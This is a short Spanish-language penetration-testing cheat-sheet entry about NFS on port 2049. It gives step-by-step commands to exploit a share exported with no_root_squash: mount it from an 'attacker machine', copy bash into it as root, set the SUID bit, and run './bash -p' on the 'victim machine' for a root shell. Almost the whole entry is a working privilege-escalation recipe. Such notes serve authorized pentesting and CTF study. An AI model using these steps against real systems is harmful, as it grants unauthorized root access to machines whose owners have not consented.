# 2049/TCP (NFS)

## no\_root\_squash

Revisar el archivo `/etc/exports` y verificar si existe un directorio configurado con `no_root_squash` .

Montar el directorio encontrado en la máquina atacante.

```sh
sudo mkdir /mnt/nfs-temp
sudo mount -t nfs <IP-address>:<share> /mnt/nfs-temp/ -nolock
```

Copiar desde la máquina atacante como usuario `root` el binario `bash` al directorio encontrado.

```sh
sudo cp /bin/bash /mnt/nfs-temp/<share>
```

Asignar privilegios de SUID (Set User ID) al binario `bash` copiado.

```sh
sudo chmod +s bash
```

Ejecutar desde la máquina victima el binario `bash`.

```sh
cd <share>
./bash -p
```